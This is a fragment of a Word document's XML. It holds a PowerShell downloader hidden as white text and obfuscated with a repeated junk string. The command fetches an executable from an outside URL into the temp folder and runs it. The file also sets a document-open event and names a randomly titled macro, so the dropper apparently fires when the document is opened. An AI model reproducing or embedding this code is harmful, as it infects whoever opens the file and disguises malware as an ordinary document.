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before="0" w:after="200"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>cpvtdbsdaqgiunmpcpvtdbsdaqgiunmowcpvtdbsdaqgiunmecpvtdbsdaqgiunmrshcpvtdbsdaqgiunmecpvtdbsdaqgiunmlcpvtdbsdaqgiunml.cpvtdbsdaqgiunmexcpvtdbsdaqgiunme $ccpvtdbsdaqgiunmlcpvtdbsdaqgiunmicpvtdbsdaqgiunmcpvtdbsdaqgiunmecpvtdbsdaqgiunmncpvtdbsdaqgiunmt = ncpvtdbsdaqgiunmcpvtdbsdaqgiunmew-objcpvtdbsdaqgiunmcpvtdbsdaqgiunmectcpvtdbsdaqgiunm Scpvtdbsdaqgiunmystcpvtdbsdaqgiunmemcpvtdbsdaqgiunm.Ncpvtdbsdaqgiunmecpvtdbsdaqgiunmt.WcpvtdbsdaqgiunmecpvtdbsdaqgiunmbcpvtdbsdaqgiunmClicpvtdbsdaqgiunmcpvtdbsdaqgiunmencpvtdbsdaqgiunmt;$cpvtdbsdaqgiunmcpvtdbsdaqgiunmacpvtdbsdaqgiunm = 'hcpvtdbsdaqgiunmtcpvtdbsdaqgiunmtpcpvtdbsdaqgiunms:cpvtdbsdaqgiunm/cpvtdbsdaqgiunm/cpvtdbsdaqgiunmbhrcpvtdbsdaqgiunmamcpvtdbsdaqgiunman.org/scpvtdbsdaqgiunmenior/scpvtdbsdaqgiunmenior.cpvtdbsdaqgiunmexcpvtdbsdaqgiunme'.Split(',');$cpvtdbsdaqgiunmhcpvtdbsdaqgiunmucpvtdbsdaqgiunmcpvtdbsdaqgiunmacpvtdbsdaqgiunmscpvtdbsdaqgiunm = $cpvtdbsdaqgiunmenv:tcpvtdbsdaqgiunmemp + '\xfdstonfoy.cpvtdbsdaqgiunmexcpvtdbsdaqgiunme';fcpvtdbsdaqgiunmocpvtdbsdaqgiunmrcpvtdbsdaqgiunmcpvtdbsdaqgiunmecpvtdbsdaqgiunmcpvtdbsdaqgiunmacpvtdbsdaqgiunmccpvtdbsdaqgiunmh($cpvtdbsdaqgiunmbcpvtdbsdaqgiunm in $cpvtdbsdaqgiunmcpvtdbsdaqgiunmacpvtdbsdaqgiunm){cpvtdbsdaqgiunmtcpvtdbsdaqgiunmrcpvtdbsdaqgiunmy{$ccpvtdbsdaqgiunmlcpvtdbsdaqgiunmicpvtdbsdaqgiunmcpvtdbsdaqgiunmecpvtdbsdaqgiunmncpvtdbsdaqgiunmt.DowcpvtdbsdaqgiunmnlcpvtdbsdaqgiunmocpvtdbsdaqgiunmadcpvtdbsdaqgiunmFicpvtdbsdaqgiunmlcpvtdbsdaqgiunme($cpvtdbsdaqgiunmbcpvtdbsdaqgiunm.TocpvtdbsdaqgiunmStcpvtdbsdaqgiunmricpvtdbsdaqgiunmng(), $cpvtdbsdaqgiunmhcpvtdbsdaqgiunmucpvtdbsdaqgiunmcpvtdbsdaqgiunmacpvtdbsdaqgiunmscpvtdbsdaqgiunm);cpvtdbsdaqgiunmIcpvtdbsdaqgiunmncpvtdbsdaqgiunmvcpvtdbsdaqgiunmocpvtdbsdaqgiunmkcpvtdbsdaqgiunmcpvtdbsdaqgiunme-cpvtdbsdaqgiunmIcpvtdbsdaqgiunmtcpvtdbsdaqgiunmcpvtdbsdaqgiunmecpvtdbsdaqgiunmm($cpvtdbsdaqgiunmhcpvtdbsdaqgiunmucpvtdbsdaqgiunmcpvtdbsdaqgiunmacpvtdbsdaqgiunmscpvtdbsdaqgiunm);bcpvtdbsdaqgiunmrcpvtdbsdaqgiunmcpvtdbsdaqgiunmecpvtdbsdaqgiunmcpvtdbsdaqgiunmacpvtdbsdaqgiunmk;cpvtdbsdaqgiunm}ccpvtdbsdaqgiunmcpvtdbsdaqgiunmacpvtdbsdaqgiunmtcpvtdbsdaqgiunmccpvtdbsdaqgiunmhcpvtdbsdaqgiunm{wcpvtdbsdaqgiunmrcpvtdbsdaqgiunmitcpvtdbsdaqgiunmcpvtdbsdaqgiunme-hcpvtdbsdaqgiunmocpvtdbsdaqgiunmst $_cpvtdbsdaqgiunm.Ecpvtdbsdaqgiunmxcpvtdbsdaqgiunmccpvtdbsdaqgiunmcpvtdbsdaqgiunmecpvtdbsdaqgiunmptcpvtdbsdaqgiunmiocpvtdbsdaqgiunmncpvtdbsdaqgiunm.Mcpvtdbsdaqgiunmcpvtdbsdaqgiunmecpvtdbsdaqgiunmsscpvtdbsdaqgiunmcpvtdbsdaqgiunmagcpvtdbsdaqgiunmcpvtdbsdaqgiunme}cpvtdbsdaqgiunm}cpvtdbsdaqgiunm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docEvents>
    <wne:eventDocOpen/>
  </wne:docEvents>
  <wne:mcds>
    <wne:mcd wne:macroName="PROJECT.KMWBSBQ.GQLPMNCO" wne:name="Project.kmwBSBq.gQLpMNCo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92</Words>
  <Characters>2241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0:54:00Z</dcterms:created>
  <dc:creator>JuiceToolz</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>JuiceToolz</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-06T2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